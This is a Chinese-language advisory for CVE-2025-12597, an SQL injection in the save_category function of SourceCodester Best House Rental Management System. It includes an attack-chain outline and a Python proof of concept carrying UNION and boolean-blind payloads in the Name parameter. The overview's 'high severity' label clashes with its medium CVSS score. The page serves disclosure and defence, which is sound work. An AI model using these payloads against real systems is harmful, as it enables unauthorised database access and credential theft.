CVE-2025-12597 CVSS 4.7 中危

CVE-2025-12597 SourceCodester房屋租赁系统save_category函数SQL注入漏洞

披露日期: 2025-11-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-12597

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Best House Rental Management System 1.0

漏洞概述

CVE-2025-12597是SourceCodester Best House Rental Management System 1.0版本中的一个高危SQL注入漏洞。该漏洞存在于/admin_class.php文件中的save_category函数，攻击者可以通过操纵Name参数实现SQL注入攻击。由于该漏洞需要高权限用户认证才能利用（PR:H），但可以通过远程方式发起攻击（AV:N），成功利用可导致敏感数据泄露、数据篡改或数据库服务器沦陷。CVSS评分4.7，属于中等严重程度。漏洞已于2025年11月2日公开披露， exploit代码已在互联网公开，威胁等级不容忽视。建议受影响用户尽快采取防御措施。

技术细节

该SQL注入漏洞位于/admin_class.php文件的save_category函数中。攻击者通过HTTP请求向该函数提交精心构造的Name参数值，利用SQL语法构造恶意payload。在未充分过滤用户输入的情况下，恶意SQL代码会被直接拼接到数据库查询语句中执行。攻击者可利用UNION SELECT、布尔盲注、时间盲注等技术提取数据库中的敏感信息，包括用户凭证、管理员密码哈希、系统配置数据等。由于漏洞涉及PR:H级别权限要求，攻击者需要先获取管理员账户或利用其他漏洞提升权限。漏洞影响系统的数据机密性、完整性和可用性，CVSS向量为CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L。

攻击链分析

STEP 1

步骤1

攻击者访问目标网站并获取管理员账户访问权限

STEP 2

步骤2

导航至分类管理功能模块，找到save_category函数入口点

STEP 3

步骤3

构造恶意SQL注入payload，通过Name参数提交到/admin_class.php

STEP 4

步骤4

利用UNION SELECT、盲注等技术提取数据库敏感信息或执行任意SQL命令

STEP 5

步骤5

获取用户凭证后进一步横向移动或完全控制数据库服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12597 SQL Injection PoC
# Target: SourceCodester Best House Rental Management System 1.0
# Endpoint: /admin_class.php (save_category function)

target_url = "http://target.com/admin_class.php"

# SQL Injection payload for save_category function
# Using UNION-based injection to extract database information
payload = {
    "Name": "test' UNION SELECT NULL,version(),user(),database()-- -",
    "save_category": ""
}

# Blind Boolean-based injection alternative
blind_payload = {
    "Name": "test' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)='1",
    "save_category": ""
}

def exploit(target, payload_data):
    try:
        response = requests.post(target, data=payload_data, timeout=10)
        print(f"[*] Request sent to {target}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    print("[*] CVE-2025-12597 SQL Injection PoC")
    print("[*] Target:", target_url)
    exploit(target_url, payload)

影响范围

SourceCodester Best House Rental Management System 1.0

防御指南

临时缓解措施

在修复前，可采取以下临时缓解措施：1) 禁用分类管理功能模块；2) 限制管理员账户的网络访问；3) 部署WAF规则过滤可疑SQL关键字；4) 加强管理员密码策略防止凭证被盗；5) 启用数据库操作日志审计以便及时发现异常攻击行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表